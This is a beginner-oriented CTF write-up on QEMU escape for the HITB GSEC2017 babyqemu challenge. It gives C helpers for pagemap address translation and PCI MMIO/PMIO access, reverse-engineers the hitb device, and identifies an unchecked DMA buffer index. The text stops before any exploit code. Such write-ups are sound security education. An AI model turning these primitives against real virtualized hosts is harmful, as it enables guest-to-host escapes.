To start with, QEMU is, as is well known, an open-source emulator and virtualizer that emulates a CPU through dynamic binary translation.

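In practice QEMU has several run modes. User mode can be used to debug binaries built for other architectures such as ARM and MIPS, while System mode emulates a complete machine and is what kernel pwn challenges are debugged in. QEMU escape challenges also run in System mode: the challenge usually ships a deliberately vulnerable device, and the goal is to exploit it.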

QEMU memory layout

QEMU uses mmap to allocate a region of the requested size that serves as the guest's physical memory. This region is not executable.

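QEMU address translation

Guest virtual address -> guest physical address

Guest physical address -> QEMU virtual address space: the guest's physical address is translated into the region that QEMU allocated with mmap, whose contents correspond one-to-one to the guest's physical memory.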
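The second translation step can be sketched in a few lines of C. This is a deliberately simplified model, assuming guest RAM is one contiguous mmap'd block; the names `gpa_to_hva`, `ram_base` and `ram_size` are made up for illustration and are not QEMU APIs (real QEMU tracks several memory regions).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical model: ram_base is the host address returned by mmap for
 * guest RAM, ram_size is the size of that mapping. */
uint8_t *gpa_to_hva(uint8_t *ram_base, size_t ram_size, uint64_t gpa)
{
    assert(ram_base != NULL);
    if (gpa >= ram_size)
        return NULL;            /* outside guest RAM in this simple model */
    return ram_base + gpa;      /* one-to-one: host VA = base + guest PA */
}
```

In this model a guest physical address is simply an offset into QEMU's mapping, which is why leaking a host pointer plus knowing a guest physical address is often enough to locate guest data inside the QEMU process.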

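On x64, a virtual address consists of a page offset (bits 0-11) and a page number. The file /proc/$pid/pagemap exposes the process's page table, so a user-space process can find out which physical frame each virtual page maps to (reading the frame number requires CAP_SYS_ADMIN). It holds one 64-bit value per virtual page, laid out as follows.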

Bits 0-54 page frame number (PFN) if present

Bits 0-4 swap type if swapped

Bits 5-54 swap offset if swapped

Bit 55 pte is soft-dirty (see Documentation/vm/soft-dirty.txt)

Bit 56 page exclusively mapped (since 4.2)

Bits 57-60 zero

Bit 61 page is file-page or shared-anon (since 3.5)

Bit 62 page swapped

Bit 63 page present
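To make the layout concrete, here is a small sketch that unpacks one raw 64-bit pagemap entry into named fields. The struct and function names are my own; only the bit positions come from the list above.

```c
#include <stdbool.h>
#include <stdint.h>

/* Field names are illustrative; bit positions follow the list above. */
struct pagemap_entry {
    bool present;         /* bit 63 */
    bool swapped;         /* bit 62 */
    bool file_or_shared;  /* bit 61 */
    bool exclusive;       /* bit 56 */
    bool soft_dirty;      /* bit 55 */
    uint64_t pfn;         /* bits 0-54, meaningful only when present */
};

struct pagemap_entry decode_pagemap_entry(uint64_t raw)
{
    struct pagemap_entry e;
    e.present        = (raw >> 63) & 1;
    e.swapped        = (raw >> 62) & 1;
    e.file_or_shared = (raw >> 61) & 1;
    e.exclusive      = (raw >> 56) & 1;
    e.soft_dirty     = (raw >> 55) & 1;
    e.pfn            = e.present ? (raw & ((1ULL << 55) - 1)) : 0;
    return e;
}
```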

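Based on this, /proc/pid/pagemap can be used to translate a virtual address into a physical address:

1. Compute the offset in /proc/pid/pagemap of the entry for the virtual page that contains the address: offset = (viraddr / pagesize) * sizeof(uint64_t)

2. Read the 64-bit entry

3. Check bit 63 to see whether the physical page is present

4. If it is present, take bits 0-54 as the page frame number

5. Add the page offset to the start of the physical page to get the physical address: phyaddr = pageframenum * pagesize + viraddr % pagesize

The corresponding code: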

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/io.h>
#include <stdint.h>

#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT)

/* Translate a virtual address of the current process into a physical
 * address via /proc/self/pagemap. Returns 0 on failure. */
size_t va2pa(void *addr)
{
    uint64_t data;

    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) {   /* open() returns -1 on failure, not 0 */
        perror("open pagemap");
        return 0;
    }

    /* One 64-bit entry per virtual page. */
    size_t offset = ((uintptr_t)addr / PAGE_SIZE) * sizeof(uint64_t);

    if (lseek(fd, offset, SEEK_SET) < 0) {
        puts("lseek");
        close(fd);
        return 0;
    }

    if (read(fd, &data, 8) != 8) {
        puts("read");
        close(fd);
        return 0;
    }

    /* Bit 63: page present. */
    if (!(data & (((uint64_t)1 << 63)))) {
        puts("page");
        close(fd);
        return 0;
    }

    /* Bits 0-54: page frame number. */
    size_t pageframenum = data & ((1ull << 55) - 1);
    size_t phyaddr = pageframenum * PAGE_SIZE + (uintptr_t)addr % PAGE_SIZE;

    close(fd);

    return phyaddr;
}

int main()
{
    char *userbuf;
    uint64_t userbuf_pa;
    unsigned char *mmio_mem;

    int mmio_fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);
    if (mmio_fd == -1) {
        perror("open mmio");
        exit(-1);
    }

    mmio_mem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    if (mmio_mem == MAP_FAILED) {
        perror("mmap mmio");
        exit(-1);
    }

    printf("mmio_mem:\t%p\n", mmio_mem);

    userbuf = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    if (userbuf == MAP_FAILED) {
        perror("mmap userbuf");
        exit(-1);
    }

    /* Touch and lock the page so that it is present and stays resident. */
    strcpy(userbuf, "test");
    mlock(userbuf, 0x1000);
    userbuf_pa = va2pa(userbuf);

    printf("userbuf_va:\t%p\n", userbuf);
    printf("userbuf_pa:\t%p\n", (void *)userbuf_pa);
}
```

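PCI devices

A device that conforms to the PCI bus standard is called a PCI device, and a PCI bus architecture can contain multiple PCI devices. PCI devices are divided into masters and targets: the master initiates an access, and the target is the device being accessed.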



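MMIO

Devices can expose their registers through different address-mapping modes. MMIO is memory-mapped I/O: the device shares an address space with memory, so its registers can be read and written just like ordinary memory.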



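Bit 0: Region Type, always 0, which marks the BAR as a Memory region

Bits 2-1: Locatable, 0 means a 32-bit address, 2 means a 64-bit address, 1 means the region must be mapped below 1 MB (a legacy encoding)

Bit 3: Prefetchable, 0 means prefetching is disabled, 1 means it is enabled

Bits 31-4: Base Address, 16-byte aligned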
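As a quick illustration of these fields, the sketch below splits a raw 32-bit memory BAR value into its parts. The struct and function names are hypothetical; the masks follow the bit layout just listed.

```c
#include <stdbool.h>
#include <stdint.h>

/* Illustrative names; the bit positions follow the list above. */
struct mem_bar {
    bool is_memory;      /* bit 0 == 0 */
    unsigned type;       /* bits 2-1: 0 = 32-bit, 2 = 64-bit */
    bool prefetchable;   /* bit 3 */
    uint32_t base;       /* bits 31-4, 16-byte aligned */
};

struct mem_bar decode_mem_bar(uint32_t bar)
{
    struct mem_bar m;
    m.is_memory    = (bar & 0x1) == 0;
    m.type         = (bar >> 1) & 0x3;
    m.prefetchable = (bar >> 3) & 0x1;
    m.base         = bar & 0xFFFFFFF0u;
    return m;
}
```

For example, a BAR value of 0xfea00000 decodes to a non-prefetchable 32-bit memory region based at 0xfea00000.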

Example of accessing the MMIO space from user mode:

```c
#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/io.h>

unsigned char *mmio_mem;

void die(const char *msg)
{
    perror(msg);
    exit(-1);
}

/* 32-bit write to the register at offset addr inside the mapped BAR. */
void mmio_write(uint32_t addr, uint32_t value)
{
    *((uint32_t *)(mmio_mem + addr)) = value;
}

/* 32-bit read from the register at offset addr inside the mapped BAR. */
uint32_t mmio_read(uint32_t addr)
{
    return *((uint32_t *)(mmio_mem + addr));
}

int main(int argc, char *argv[])
{
    /* Open file for accessing MMIO */
    int mmio_fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);
    if (mmio_fd == -1)
        die("mmio_fd open failed");

    mmio_mem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    if (mmio_mem == MAP_FAILED)
        die("mmap mmio_mem failed");

    printf("mmio_mem @ %p\n", mmio_mem);

    mmio_read(0x128);
    mmio_write(0x128, 1337);
}
```

Example of accessing the MMIO space from kernel mode:

```c
#include <asm/io.h>
#include <linux/ioport.h>

/* ioaddr: physical base of the MMIO region, iomemsize: its length */
void __iomem *addr = ioremap(ioaddr, iomemsize);

/* 8/16/32/64-bit reads */
readb(addr);
readw(addr);
readl(addr);
readq(addr);

/* 8/16/32/64-bit writes */
writeb(val, addr);
writew(val, addr);
writel(val, addr);
writeq(val, addr);

iounmap(addr);
```



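PMIO

PMIO is port-mapped I/O: memory and I/O devices each have their own separate address space, and the CPU has to use dedicated instructions to access I/O ports. On Intel processors these instructions are IN and OUT.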



Bit 0: Region Type, always 1, which marks the BAR as an I/O region

Bit 1: Reserved

Bits 31-2: Base Address, 4-byte aligned
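The I/O BAR layout can be decoded the same way. This is only a sketch with made-up names; the example value 0xc051 is chosen so that the decoded base matches the 0xc050 port base used in the PMIO example in this post.

```c
#include <stdbool.h>
#include <stdint.h>

/* Illustrative names; the bit positions follow the list above. */
struct io_bar {
    bool is_io;      /* bit 0 == 1 */
    uint32_t base;   /* bits 31-2, 4-byte aligned port base */
};

struct io_bar decode_io_bar(uint32_t bar)
{
    struct io_bar b;
    b.is_io = (bar & 0x1) != 0;
    b.base  = bar & 0xFFFFFFFCu;   /* drop the type and reserved bits */
    return b;
}
```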

Example of accessing PMIO:

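```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/io.h>

uint32_t pmio_base = 0xc050;

void die(const char *msg)
{
    perror(msg);
    exit(-1);
}

/* 32-bit write to an I/O port (OUT instruction). */
void pmio_write(uint32_t addr, uint32_t value)
{
    outl(value, addr);
}

/* 32-bit read from an I/O port (IN instruction). */
uint32_t pmio_read(uint32_t addr)
{
    return (uint32_t)inl(addr);
}

int main(int argc, char *argv[])
{
    /* Raise the I/O privilege level so that IN/OUT are allowed; needs root. */
    if (iopl(3) != 0)
        die("I/O permission is not enough");

    pmio_write(pmio_base + 0, 0);
    pmio_write(pmio_base + 4, 1);
    return 0;
}
```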



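lspci

A PCI device address looks like 0000:00:1f.1. The first part (16 bits) is the domain, the second (8 bits) is the bus number, the third (5 bits) is the device number, and the last (3 bits) is the function number. Below is the output of lspci, with each device's address at the start of the line. Because a PC usually has only domain 0, the domain is generally omitted.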
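A minimal sketch of parsing such an address in C, accepting both the full form and the short form without a domain. `parse_pci_addr` and `struct pci_addr` are names I made up for this example.

```c
#include <stdio.h>

struct pci_addr {
    unsigned domain;  /* 16 bits */
    unsigned bus;     /*  8 bits */
    unsigned dev;     /*  5 bits */
    unsigned fn;      /*  3 bits */
};

/* Parses "dddd:bb:dd.f" or "bb:dd.f". Returns 0 on success, -1 on error. */
int parse_pci_addr(const char *s, struct pci_addr *out)
{
    unsigned d = 0, b = 0, v = 0, f = 0;

    if (sscanf(s, "%x:%x:%x.%x", &d, &b, &v, &f) != 4) {
        /* Fall back to the short form, where the domain is implicitly 0. */
        d = 0;
        if (sscanf(s, "%x:%x.%x", &b, &v, &f) != 3)
            return -1;
    }
    /* Enforce the field widths described above. */
    if (d > 0xFFFF || b > 0xFF || v > 0x1F || f > 0x7)
        return -1;

    out->domain = d;
    out->bus = b;
    out->dev = v;
    out->fn = f;
    return 0;
}
```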



Under /sys/bus/pci/devices there are files associated with each device on the bus.



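In each device's directory, the resourceN files expose the device's BAR regions. In the layout described here, resource0 corresponds to the MMIO space and resource1 to the PMIO space.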

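HITB GSEC2017 babyqemu

This was my first QEMU escape, so the notes are fairly detailed and aimed at beginners.

Analyzing the program

The first thing to look at is the launch script: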

```bash
./qemu-system-x86_64 \
-initrd ./rootfs.cpio \
-kernel ./vmlinuz-4.8.0-52-generic \
-append 'console=ttyS0 root=/dev/ram oops=panic panic=1' \
-enable-kvm \
-monitor /dev/null \
-m 64M --nographic -L ./dependency/usr/local/share/qemu \
-L pc-bios \
-device hitb,id=vda
```

Note the -device option: the device here is hitb, a PCI device.



To reverse it, load qemu-system-x86_64 into IDA and search for hitb.

Start with the init function:

```c
void __fastcall hitb_class_init(ObjectClass_0 *a1, void *data)
{
  ObjectClass_0 *v2;

  v2 = object_class_dynamic_cast_assert(
         a1,
         (const char *)&stru_64A230.bulk_in_pending[2].data[72],
         (const char *)&stru_5AB2C8.msi_vectors,
         469,
         "hitb_class_init");
  BYTE4(v2[2].object_cast_cache[3]) = 16;
  HIWORD(v2[2].object_cast_cache[3]) = 255;
  v2[2].type = (Type)pci_hitb_realize;
  v2[2].object_cast_cache[0] = (const char *)pci_hitb_uninit;
  LOWORD(v2[2].object_cast_cache[3]) = 4660;
  WORD1(v2[2].object_cast_cache[3]) = 9011;
}
```

In the init function, the class object needs to be typed as a PCIDeviceClass structure. Its definition can be found in Local Types.

```c
struct PCIDeviceClass
{
  DeviceClass_0 parent_class;
  void (*realize)(PCIDevice_0 *, Error_0 **);
  int (*init)(PCIDevice_0 *);
  PCIUnregisterFunc *exit;
  PCIConfigReadFunc *config_read;
  PCIConfigWriteFunc *config_write;
  uint16_t vendor_id;
  uint16_t device_id;
  uint8_t revision;
  uint16_t class_id;
  uint16_t subsystem_vendor_id;
  uint16_t subsystem_id;
  int is_bridge;
  int is_express;
  const char *romfile;
};
```

Add the structure manually, then retype the variable in the init function:

```
00000000 PCIDeviceClass      struc ; (sizeof=0x108, align=0x8, copyof_1371)
00000000 parent_class        DeviceClass_0 ?
000000C0 realize             dq ?                    ; offset
000000C8 init                dq ?                    ; offset
000000D0 exit                dq ?                    ; offset
000000D8 config_read         dq ?                    ; offset
000000E0 config_write        dq ?                    ; offset
000000E8 vendor_id           dw ?
000000EA device_id           dw ?
000000EC revision            db ?
000000ED                     db ? ; undefined
000000EE class_id            dw ?
000000F0 subsystem_vendor_id dw ?
000000F2 subsystem_id        dw ?
000000F4 is_bridge           dd ?
000000F8 is_express          dd ?
000000FC                     db ? ; undefined
000000FD                     db ? ; undefined
000000FE                     db ? ; undefined
000000FF                     db ? ; undefined
00000100 romfile             dq ?                    ; offset
00000108 PCIDeviceClass      ends
00000108
```

```c
void __fastcall hitb_class_init(ObjectClass_0 *a1, void *data)
{
  PCIDeviceClass *v2;

  v2 = (PCIDeviceClass *)object_class_dynamic_cast_assert(
                           a1,
                           (const char *)&stru_64A230.bulk_in_pending[2].data[72],
                           (const char *)&stru_5AB2C8.msi_vectors,
                           469,
                           "hitb_class_init");
  v2->revision = 16;
  v2->class_id = 255;
  v2->realize = pci_hitb_realize;
  v2->exit = pci_hitb_uninit;
  v2->vendor_id = 4660;
  v2->device_id = 0x2333;
}
```

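This shows that the device ID is device_id = 0x2333 and the vendor ID is vendor_id = 0x1234 (4660 in decimal). Inside the guest, lspci, the device's sysfs directory, and its resource file look like this: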
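To match the decompiled constants against lspci, it helps to print them in the vendor:device form that lspci uses. A tiny sketch (the helper name `format_pci_id` is hypothetical):

```c
#include <stdint.h>
#include <stdio.h>

/* Formats the IDs as four hex digits each, separated by a colon.
 * Returns the snprintf result. */
int format_pci_id(uint16_t vendor_id, uint16_t device_id, char *buf, size_t len)
{
    return snprintf(buf, len, "%04x:%04x", vendor_id, device_id);
}
```

Calling it with the decimal values from the decompilation, 4660 and 9011, produces the string `1234:2333`.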

```
00:00.0 Class 0600: 8086:1237
00:01.3 Class 0680: 8086:7113
00:03.0 Class 0200: 8086:100e
00:01.1 Class 0101: 8086:7010
00:02.0 Class 0300: 1234:1111
00:01.0 Class 0601: 8086:7000
00:04.0 Class 00ff: 1234:2333

broken_parity_status      firmware_node  rescan
class                     irq            resource
config                    local_cpulist  resource0
consistent_dma_mask_bits  local_cpus     subsystem
d3cold_allowed            modalias       subsystem_device
device                    msi_bus        subsystem_vendor
dma_mask_bits             numa_node      uevent
driver_override           power          vendor
enable                    remove

0x00000000fea00000 0x00000000feafffff 0x0000000000040200
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
```

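Each line of the resource file has the format start end flags. Because there is no resource1 file here, and because the lowest bit of the flags on the first line is 0, the device exposes a single MMIO region at address 0xfea00000 with size 0x100000.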
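The same reasoning can be written as code. The sketch below parses one line of the resource file and derives the region size and type. The function and struct names are mine; the two flag constants are, to my knowledge, the values of IORESOURCE_IO and IORESOURCE_MEM in the kernel's linux/ioport.h, so treat them as an assumption if your kernel differs.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed to match linux/ioport.h. */
#define IORESOURCE_IO  0x00000100UL
#define IORESOURCE_MEM 0x00000200UL

struct pci_resource {
    uint64_t start;
    uint64_t end;
    uint64_t flags;
};

/* Parses "start end flags" (hex, with 0x prefix). Returns 0 on success. */
int parse_resource_line(const char *line, struct pci_resource *r)
{
    if (sscanf(line, "%" SCNx64 " %" SCNx64 " %" SCNx64,
               &r->start, &r->end, &r->flags) != 3)
        return -1;
    return 0;
}

uint64_t resource_size(const struct pci_resource *r)
{
    if (r->flags == 0)          /* unused slot: the line is all zeros */
        return 0;
    return r->end - r->start + 1;
}
```

For the first line shown above this gives a size of 0x100000 with the memory flag set and the I/O flag clear.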

Next, look at the functions the device registers, starting from pci_hitb_realize:

```c
void __fastcall pci_hitb_realize(HitbState *pdev, Error_0 **errp)
{
  pdev->pdev.config[61] = 1;
  if ( !msi_init(&pdev->pdev, 0, 1u, 1, 0, errp) )
  {
    timer_init_tl(&pdev->dma_timer, main_loop_tlg.tl[1], 1000000, (QEMUTimerCB *)hitb_dma_timer, pdev);
    qemu_mutex_init(&pdev->thr_mutex);
    qemu_cond_init(&pdev->thr_cond);
    qemu_thread_create(&pdev->thread, (const char *)&stru_5AB2C8.not_legacy_32bit + 12, hitb_fact_thread, pdev, 0);
    memory_region_init_io(&pdev->mmio, &pdev->pdev.qdev.parent_obj, &hitb_mmio_ops, pdev, "hitb-mmio", 0x100000uLL);
    pci_register_bar(&pdev->pdev, 0, 0, &pdev->mmio);
  }
}
```

First, timer_init_tl registers hitb_dma_timer as the timer callback:

```c
void __fastcall timer_init_tl(QEMUTimer_0 *ts, QEMUTimerList_0 *timer_list, int scale, QEMUTimerCB *cb, void *opaque)
{
  ts->timer_list = timer_list;
  ts->cb = cb;
  ts->opaque = opaque;
  ts->scale = scale;
  ts->expire_time = -1LL;
}
```

After that, hitb_mmio_ops is registered:

```
.data.rel.ro:00000000009690A0 40 44 28 00 00 00 00 00 A0 41 +hitb_mmio_ops dq offset hitb_mmio_read  ; read
.data.rel.ro:00000000009690A0 28 00 00 00 00 00 00 00 00 00 +                                        ; DATA XREF: pci_hitb_realize+99↑o
.data.rel.ro:00000000009690A0 00 00 00 00 00 00 00 00 00 00 +dq offset hitb_mmio_write               ; write
.data.rel.ro:00000000009690A0 00 00 00 00 00 00 00 00 00 00 +dq 0
```

So the three functions that deserve the most attention are:

```
hitb_mmio_read
hitb_mmio_write
hitb_dma_timer
```

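Analyzing the functions

Before analyzing the functions, we need to understand the device state structure. It can be found by searching in View -> Open Subviews -> Local Types (Shift + F1).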

```c
struct __attribute__((aligned(16))) HitbState
{
  PCIDevice_0 pdev;
  MemoryRegion_0 mmio;
  QemuThread_0 thread;
  QemuMutex_0 thr_mutex;
  QemuCond_0 thr_cond;
  bool stopping;
  uint32_t addr4;
  uint32_t fact;
  uint32_t status;
  uint32_t irq_status;
  dma_state dma;
  QEMUTimer_0 dma_timer;
  char dma_buf[4096];
  void (*enc)(char *, unsigned int);
  uint64_t dma_mask;
};
```

```c
struct dma_state
{
  dma_addr_t src;
  dma_addr_t dst;
  dma_addr_t cnt;
  dma_addr_t cmd;
};
```

```c
uint64_t __fastcall hitb_mmio_read(HitbState *opaque, hwaddr addr, unsigned int size)
{
  uint64_t result;
  uint64_t val;

  result = -1LL;
  if ( size == 4 )
  {
    if ( addr == 128 )
      return opaque->dma.src;
    if ( addr > 0x80 )
    {
      if ( addr == 140 )
        return *(dma_addr_t *)((char *)&opaque->dma.dst + 4);
      if ( addr <= 0x8C )
      {
        if ( addr == 132 )
          return *(dma_addr_t *)((char *)&opaque->dma.src + 4);
        if ( addr == 136 )
          return opaque->dma.dst;
      }
      else
      {
        if ( addr == 144 )
          return opaque->dma.cnt;
        if ( addr == 152 )
          return opaque->dma.cmd;
      }
    }
    else
    {
      if ( addr == 8 )
      {
        qemu_mutex_lock(&opaque->thr_mutex);
        val = opaque->fact;
        qemu_mutex_unlock(&opaque->thr_mutex);
        return val;
      }
      if ( addr <= 8 )
      {
        result = 0x10000EDLL;
        if ( !addr )
          return result;
        if ( addr == 4 )
          return opaque->addr4;
      }
      else
      {
        if ( addr == 32 )
          return opaque->status;
        if ( addr == 36 )
          return opaque->irq_status;
      }
    }
    return -1LL;
  }
  return result;
}
```

A read is only serviced when size == 4.

```c
void __fastcall hitb_mmio_write(HitbState *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
  uint32_t v4;
  int v5;
  bool v6;
  int64_t ns;

  if ( (addr > 0x7F || size == 4) && (((size - 4) & 0xFFFFFFFB) == 0 || addr <= 0x7F) )
  {
    if ( addr == 128 )
    {
      if ( (opaque->dma.cmd & 1) == 0 )
        opaque->dma.src = val;
    }
    else
    {
      v4 = val;
      if ( addr > 0x80 )
      {
        if ( addr == 140 )
        {
          if ( (opaque->dma.cmd & 1) == 0 )
            *(dma_addr_t *)((char *)&opaque->dma.dst + 4) = val;
        }
        else if ( addr > 0x8C )
        {
          if ( addr == 144 )
          {
            if ( (opaque->dma.cmd & 1) == 0 )
              opaque->dma.cnt = val;
          }
          else if ( addr == 152 && (val & 1) != 0 && (opaque->dma.cmd & 1) == 0 )
          {
            opaque->dma.cmd = val;
            ns = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL_0);
            timer_mod(&opaque->dma_timer, ns / 1000000 + 100);
          }
        }
        else if ( addr == 132 )
        {
          if ( (opaque->dma.cmd & 1) == 0 )
            *(dma_addr_t *)((char *)&opaque->dma.src + 4) = val;
        }
        else if ( addr == 136 && (opaque->dma.cmd & 1) == 0 )
        {
          opaque->dma.dst = val;
        }
      }
      else if ( addr == 32 )
      {
        if ( (val & 0x80) != 0 )
          _InterlockedOr((volatile signed __int32 *)&opaque->status, 0x80u);
        else
          _InterlockedAnd((volatile signed __int32 *)&opaque->status, 0xFFFFFF7F);
      }
      else if ( addr > 0x20 )
      {
        if ( addr == 96 )
        {
          v6 = ((unsigned int)val | opaque->irq_status) == 0;
          opaque->irq_status |= val;
          if ( !v6 )
            hitb_raise_irq(opaque, 0x60u);
        }
        else if ( addr == 100 )
        {
          v5 = ~(_DWORD)val;
          v6 = (v5 & opaque->irq_status) == 0;
          opaque->irq_status &= v5;
          if ( v6 && !msi_enabled(&opaque->pdev) )
            pci_set_irq(&opaque->pdev, 0);
        }
      }
      else if ( addr == 4 )
      {
        opaque->addr4 = ~(_DWORD)val;
      }
      else if ( addr == 8 && (opaque->status & 1) == 0 )
      {
        qemu_mutex_lock(&opaque->thr_mutex);
        opaque->fact = v4;
        _InterlockedOr((volatile signed __int32 *)&opaque->status, 1u);
        qemu_cond_signal(&opaque->thr_cond);
        qemu_mutex_unlock(&opaque->thr_mutex);
      }
    }
  }
}
```

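Writes likewise need size == 4 (for the DMA registers at addr >= 0x80, the check also lets size == 8 through), and several operations additionally require (opaque->dma.cmd & 1) == 0.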
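The size condition at the top of hitb_mmio_write is easier to read when pulled out into a predicate. The function below copies the decompiled expression verbatim; only the name `hitb_write_accepted` is mine.

```c
#include <stdbool.h>
#include <stdint.h>

/* Same expression as the first `if` in the decompiled hitb_mmio_write. */
bool hitb_write_accepted(uint64_t addr, unsigned int size)
{
    return (addr > 0x7F || size == 4) &&
           (((size - 4) & 0xFFFFFFFBu) == 0 || addr <= 0x7F);
}
```

The mask 0xFFFFFFFB clears bit 2, so `(size - 4) & 0xFFFFFFFB` is zero exactly when size is 4 or 8. Registers below 0x80 therefore accept only 4-byte writes, while the DMA registers accept 4-byte or 8-byte writes.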

```c
void __fastcall hitb_dma_timer(HitbState *opaque)
{
  dma_addr_t cmd;
  __int64 v2;
  uint8_t *cnt_low;
  dma_addr_t v4;
  dma_addr_t v5;
  uint8_t *v6;
  char *v7;

  cmd = opaque->dma.cmd;
  if ( (cmd & 1) != 0 )
  {
    if ( (cmd & 2) != 0 )
    {
      v2 = (unsigned int)(LODWORD(opaque->dma.src) - 0x40000);
      if ( (cmd & 4) != 0 )
      {
        v7 = &opaque->dma_buf[v2];
        opaque->enc(v7, opaque->dma.cnt);
        cnt_low = (uint8_t *)v7;
      }
      else
      {
        cnt_low = (uint8_t *)&opaque->dma_buf[v2];
      }
      cpu_physical_memory_rw(opaque->dma.dst, cnt_low, opaque->dma.cnt, 1);
      v4 = opaque->dma.cmd;
      v5 = v4 & 4;
    }
    else
    {
      v6 = (uint8_t *)&opaque[-36] + (unsigned int)opaque->dma.dst - 2824;
      LODWORD(cnt_low) = (_DWORD)opaque + opaque->dma.dst - 0x40000 + 3000;
      cpu_physical_memory_rw(opaque->dma.src, v6, opaque->dma.cnt, 0);
      v4 = opaque->dma.cmd;
      v5 = v4 & 4;
      if ( (v4 & 4) != 0 )
      {
        cnt_low = (uint8_t *)LODWORD(opaque->dma.cnt);
        opaque->enc((char *)v6, (unsigned int)cnt_low);
        v4 = opaque->dma.cmd;
        v5 = v4 & 4;
      }
    }
    opaque->dma.cmd = v4 & 0xFFFFFFFFFFFFFFFELL;
    if ( v5 )
    {
      opaque->irq_status |= 0x100u;
      hitb_raise_irq(opaque, (uint32_t)cnt_low);
    }
  }
}
```

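This is the timer callback. In hitb_mmio_write above, it gets scheduled once `addr == 0x98 && (val & 1) != 0 && (opaque->dma.cmd & 1) == 0` holds. The callback uses cpu_physical_memory_rw; while reading the documentation I also came across the related functions cpu_physical_memory_read and cpu_physical_memory_write, so its purpose is easy to guess: it copies data between a guest physical address and a buffer in QEMU's own virtual address space. Its first argument is a physical address, so a guest virtual address first has to be converted to a physical address by reading /proc/$pid/pagemap.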
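To make the direction of the last argument explicit, here is a toy model of the call. It is not QEMU's implementation: guest RAM is just a flat byte array, and the name `model_physical_memory_rw` and the bounds check are my own additions. The argument order mirrors the calls seen in hitb_dma_timer (physical address, buffer, length, is_write).

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Toy model: is_write != 0 copies buf -> guest memory,
 * is_write == 0 copies guest memory -> buf. Returns 0 on success. */
int model_physical_memory_rw(uint8_t *guest_ram, size_t ram_size,
                             uint64_t gpa, uint8_t *buf, size_t len,
                             int is_write)
{
    if (gpa > ram_size || len > ram_size - gpa)
        return -1;                          /* outside the modelled RAM */
    if (is_write)
        memcpy(guest_ram + gpa, buf, len);  /* device buffer -> guest */
    else
        memcpy(buf, guest_ram + gpa, len);  /* guest -> device buffer */
    return 0;
}
```

With this reading, the `cmd & 2` branch (last argument 1) moves bytes out of dma_buf into guest memory, and the other branch (last argument 0) moves guest bytes into dma_buf.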

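When dma.cmd == 7: idx = dma.src - 0x40000, addr = &dma_buf[idx]; enc is called on that buffer, and the result is written to dma.dst.

When dma.cmd == 3: idx = dma.src - 0x40000, addr = &dma_buf[idx]; the buffer is written to dma.dst.

When dma.cmd == 1: idx = dma.dst - 0x40000, addr = &dma_buf[idx]; the data at dma.src is copied into it (debugging shows that the second argument really is the address of dma_buf[dma.dst - 0x40000]).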
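The three cases boil down to three bits of dma.cmd. The sketch below decodes a command into a small plan structure; the struct, function, and macro names are illustrative, and the interpretation of the non-`cmd & 2` branch follows the reading given in this post rather than the raw pointer arithmetic in the decompilation.

```c
#include <stdbool.h>
#include <stdint.h>

#define DMA_CMD_START    0x1  /* hypothetical names for the three bits */
#define DMA_CMD_TO_GUEST 0x2  /* set: dma_buf -> guest memory */
#define DMA_CMD_ENC      0x4  /* set: run enc on the buffer */

struct dma_plan {
    bool run;           /* bit 0: transfer is armed */
    bool buf_to_guest;  /* bit 1: direction */
    bool call_enc;      /* bit 2: call the enc callback */
    uint32_t idx;       /* index into dma_buf, no bounds check */
};

struct dma_plan plan_dma(uint64_t cmd, uint64_t src, uint64_t dst)
{
    struct dma_plan p = {0};

    p.run = (cmd & DMA_CMD_START) != 0;
    if (!p.run)
        return p;
    p.buf_to_guest = (cmd & DMA_CMD_TO_GUEST) != 0;
    p.call_enc     = (cmd & DMA_CMD_ENC) != 0;
    /* The buffer side is src when copying out, dst when copying in. */
    p.idx = (uint32_t)((p.buf_to_guest ? src : dst) - 0x40000);
    return p;
}
```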

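The purpose of the device is now clear: it implements a DMA mechanism. DMA (Direct Memory Access) is an important feature of all modern computers. It lets hardware running at different speeds communicate without imposing a heavy interrupt load on the CPU. A DMA transfer copies data from one address space to another: the CPU initiates the transfer, and the DMA controller carries it out.

In other words, the guest first writes to MMIO addresses (addr and value), and hitb_mmio_write stores the DMA parameters (src, dst, cnt, and cmd). To start a transfer, the guest writes to addr 152, which arms the timer; the timer is then handled by another thread. When it fires, hitb_dma_timer is called, and depending on dma.cmd it uses cpu_physical_memory_rw to copy data from a physical address into dma_buf or from dma_buf to a physical address.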

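Vulnerability analysis and exploitation

Next comes the vulnerability itself, which is quite obvious. It is in hitb_dma_timer: the index v2 is used without any bounds check, so dma_buf can be read and written out of bounds.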
